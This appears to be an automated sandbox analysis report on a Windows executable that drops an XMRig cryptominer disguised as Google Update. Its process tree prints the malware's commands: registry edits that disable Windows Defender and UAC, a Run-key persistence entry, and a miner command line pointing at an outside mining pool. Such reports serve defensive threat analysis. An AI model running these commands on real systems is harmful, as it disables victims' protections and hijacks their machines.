Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28/12/2024, 22:35
Static task
static1
Behavioral task
behavioral1
Sample
8884353C745F7C2D7639EC27B31FA8D491283199F4CD0DB43EB4EB6EEA39B3D7.exe
Resource
win7-20240903-en
General
-
Target
8884353C745F7C2D7639EC27B31FA8D491283199F4CD0DB43EB4EB6EEA39B3D7.exe
-
Size
6.8MB
-
MD5
b4b6b67d5e5723248f84cfe8cb022d93
-
SHA1
e9bc93219af4b2dfc5083db3bc4ec44fdd9ef7f2
-
SHA256
8884353c745f7c2d7639ec27b31fa8d491283199f4cd0db43eb4eb6eea39b3d7
-
SHA512
7b5310116fd47c5580ff9d58e23f8009d47763609817292b171379106d5b6532589e21208c115eea923478b019ba9682a056576b255578f7c5f54d0c36786f0b
-
SSDEEP
196608:5eNb7rBym+IQaK6tmWsCiW/RCWbKSWPX2gZqZT:G1y56EWsvW/iSWPjUZT
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral2/files/0x0009000000023c50-30.dat family_xmrig behavioral2/files/0x0009000000023c50-30.dat xmrig -
Xmrig family
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation 8884353C745F7C2D7639EC27B31FA8D491283199F4CD0DB43EB4EB6EEA39B3D7.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe -
Cryptocurrency Miner
Makes network request to known mining pool URL.
-
Executes dropped EXE 1 IoCs
pid Process 1596 GoogleUpdate.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google Updates = "C:\\Users\\Admin\\AppData\\Roaming\\Google\\GoogleUpdates\\Updates.vbs" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8884353C745F7C2D7639EC27B31FA8D491283199F4CD0DB43EB4EB6EEA39B3D7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings WScript.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings 8884353C745F7C2D7639EC27B31FA8D491283199F4CD0DB43EB4EB6EEA39B3D7.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings cmd.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeLockMemoryPrivilege 1596 GoogleUpdate.exe Token: SeLockMemoryPrivilege 1596 GoogleUpdate.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 2412 wrote to memory of 1236 2412 8884353C745F7C2D7639EC27B31FA8D491283199F4CD0DB43EB4EB6EEA39B3D7.exe 84 PID 2412 wrote to memory of 1236 2412 8884353C745F7C2D7639EC27B31FA8D491283199F4CD0DB43EB4EB6EEA39B3D7.exe 84 PID 2412 wrote to memory of 1236 2412 8884353C745F7C2D7639EC27B31FA8D491283199F4CD0DB43EB4EB6EEA39B3D7.exe 84 PID 1236 wrote to memory of 4936 1236 WScript.exe 85 PID 1236 wrote to memory of 4936 1236 WScript.exe 85 PID 1236 wrote to memory of 4936 1236 WScript.exe 85 PID 4936 wrote to memory of 3464 4936 cmd.exe 87 PID 4936 wrote to memory of 3464 4936 cmd.exe 87 PID 4936 wrote to memory of 3464 4936 cmd.exe 87 PID 4936 wrote to memory of 4968 4936 cmd.exe 88 PID 4936 wrote to memory of 4968 4936 cmd.exe 88 PID 4936 wrote to memory of 4968 4936 cmd.exe 88 PID 4968 wrote to memory of 3456 4968 WScript.exe 89 PID 4968 wrote to memory of 3456 4968 WScript.exe 89 PID 4968 wrote to memory of 3456 4968 WScript.exe 89 PID 4936 wrote to memory of 4620 4936 cmd.exe 90 PID 4936 wrote to memory of 4620 4936 cmd.exe 90 PID 4936 wrote to memory of 4620 4936 cmd.exe 90 PID 4936 wrote to memory of 2560 4936 cmd.exe 91 PID 4936 wrote to memory of 2560 4936 cmd.exe 91 PID 4936 wrote to memory of 2560 4936 cmd.exe 91 PID 3456 wrote to memory of 1648 3456 WScript.exe 92 PID 3456 wrote to memory of 1648 3456 WScript.exe 92 PID 3456 wrote to memory of 1648 3456 WScript.exe 92 PID 1648 wrote to memory of 1596 1648 cmd.exe 94 PID 1648 wrote to memory of 1596 1648 cmd.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\8884353C745F7C2D7639EC27B31FA8D491283199F4CD0DB43EB4EB6EEA39B3D7.exe"C:\Users\Admin\AppData\Local\Temp\8884353C745F7C2D7639EC27B31FA8D491283199F4CD0DB43EB4EB6EEA39B3D7.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\install.vbs"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.bat" "3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Google Updates" /t REG_SZ /d ""C:\Users\Admin\AppData\Roaming"\Google\GoogleUpdates\Updates.vbs" /f4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3464
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Google\GoogleUpdates\Updates.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Google\GoogleUpdates\start.vbs"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Google\GoogleUpdates\start.bat" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Users\Admin\AppData\Roaming\Google\GoogleUpdates\GoogleUpdate.exeGoogleUpdate.exe -o xmr.pool.minergate.com:45700 -u [email protected] -p x --donate-level 17⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵
- System Location Discovery: System Language Discovery
PID:4620
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
PID:2560
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.5MB
MD531d340053db065837ae9dcfbd8472c38
SHA145ba3d64e6c2d50fdb2fa797651e07cd43ecdbdf
SHA256ddba1495d9a0135403937108e8519d29a2aad060b2f41f00aace994fb0953e8a
SHA5125fd55d1ff062c0ee1b4e457ebd042edef8e30813c192dd1b15d63805281778183345bf28b9182dc2b5d8982a257ea322bb98b72368898c6ae9ad7f28a5cf6e77
-
Filesize
63KB
MD59c70f52eb50eabfb7ff713437a8d9a21
SHA1edbaeebb72b890f05f295a53ee41cd1c2ecd46ed
SHA256aaf654c4779bb94adb94819a18ad4e7db9500e4875e1b2e5c24014cef6036625
SHA512b0bd9d615a2fac19e2782a8d7133fe4fcbd7379c1d958cd7a3318d24843e84eb054d5b7a25818d91f0b2542ccdfb83168be8ca54895f10798f4a23452256e3f3
-
Filesize
312B
MD54d6f38333bd4dff41436e3955164d838
SHA17ed8267a2e5516411fe20d573a3d4552535b98af
SHA256c48e8183618faa397c3fcd4080625c2ce2b41810a611b4f4dfe0a4a54a1f5630
SHA51254141c8c96b3d7d047491f846071d8b34bb944770c488322cef15df84712c945c9b5c7267c1c702ca099c62365bf276ce6d2eae510417d5e85bd60bed7e6cad9
-
Filesize
14KB
MD50c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
Filesize
117B
MD577cce38ec5e1fb1dfd444e185be33e55
SHA1888757f1a9049ecb692283aaece2978374435904
SHA25635153cd01cd731c2942915cdeb65cdfcfe6327ea2e3effafa60140686b9c9b94
SHA51259ecd6cacc7cab448e80c10bb2a0e2cbbdae8cc8535ab6cd9afc3d9731be556ede54ad2ab31cdf6724f238bbbfce9fb43b4567dc153ebca66f9d3fa371b1e46d
-
Filesize
659KB
MD589bb632dcbe07cd7aff17440fff46526
SHA1ee173fe3eca2a0164f63ab1f7bfb5746d56869c0
SHA2569d770c363f3e20e3ff9bc30aa6c96baff3845a23e12854fd28b63916b5a12ccd
SHA51287d27b861f2b3c2a0345e71a79dba4b6a8e29a87e73cf689a5f362cfe178bb18767d04fe051a5ecc13e2ec7512a6584a63340af03b87b71312e2b5a2858489ec
-
Filesize
3.1MB
MD579ecdc6585ce79779e4500d4bbca4ac9
SHA15ebad0df57b575d0733d2dcaa1bec055566c3c90
SHA25633b088a56b28194259d276b19c274a88c939bec88ab45ef1f3fdba9717154f53
SHA512c1f5940143b0ee1c6410163553b1791c00255f9ce994b80ea4672585404806913adce5cc960c568eb5d1b7b8e5dee2b27f0a167972a2ce7a2bf94ed575ead10d
-
Filesize
14.8MB
MD575ce028ba3c02783c002d58941901a84
SHA11e24d1954061d24f326d5e3353829f5f2b3c68c7
SHA256a4a0e8f95006bac4fd1408d75387e30cd3e0c16c821d5b3f96ea0fe0c7de07ab
SHA512a5bc4478d8c8071499fe8a35a95090f445b98c8a0778565588474d8c8b92992cc2828bc45b665a3af9d9ee1691243fc6426ed4671da4ad13e14b3c53a7470e46
-
Filesize
499B
MD56815db83f8df65b269b4413ba9d278a8
SHA12eea85805d1ffa6635fd0594754530714855839d
SHA256ca985d6a6b9fab402e511a5521fc4ec5a61207ea04dd84a75195b8cff8cfc0be
SHA51297e6d075867649ea924d57cb9a0b72f0ecffadf1746898ed97f75510a8d93876dfa40c4c2fc72c2502d1a16705251ae76d1d70ca69a08a7f2b4e763302b21ff0
-
Filesize
113B
MD5c791b2ab794c0f53eb24c43fbb3c1842
SHA12e0c383d379b5c0766279b6dbafcc10882743257
SHA256869b0c15eb404367e0b155b8f89bdd0946581cd7c99cdde1b74dd43fa1e9d5e8
SHA51239009beebed7ccde612ff7766c65a636b0d362f26db30e1469d33fcf08d42fa9dff0ee652dfea6b84c2008b9da34b1b6f7e2e7bf57c3573904cab3abad6478aa
-
Filesize
117B
MD58099c67a9631789db03e90d7b7bf0980
SHA14fbf9f44825a1184b24a0d957b20a850f3b07c42
SHA25688a4ed5c8caad58c8eda0d4ed6e36c98ce5b7545529da0cf41ffea4015b71206
SHA512c2ce0931eed4925e9b808250aa1335e234470571f4e2c95ffc16af972656fb0c3c8b383327d38ec7d1a5d6290e5c6800715b14c0cb93f8ec2092f8e9c3a26043
-
Filesize
85KB
MD55578b8106bc09064343c421d9285ad29
SHA11bb17eff7226f103235b68d298afea3a8b27f31f
SHA2563761dfb440b0e16a69dd69b325beedf4140370a99df242ace415a83b86a34f98
SHA512f546448d95f80ec46bdd2b92197e55b3d08f78ac55ed3ba5b54337e495b07df56d58239528236c3f2c88c976fa8b34a07453fd35060cc32b299551973f8885a3
-
Filesize
238B
MD536957ecf82ba5bc7d6e30f9a9aad78f2
SHA1f98dbcfc43d0a6faba7670c1a2f6521ad9d303bc
SHA2565ad8d5994f0b520b906dd0d912b43459675e61239146e63dbb1790a82ddf5130
SHA512f70d587abbc9c48d86737a04ac4915af9f29bb2786fe456ed9abcdf1568b5010942e696da4839c39aee588f084a1ded8dde74695907842aa734f5a863525395d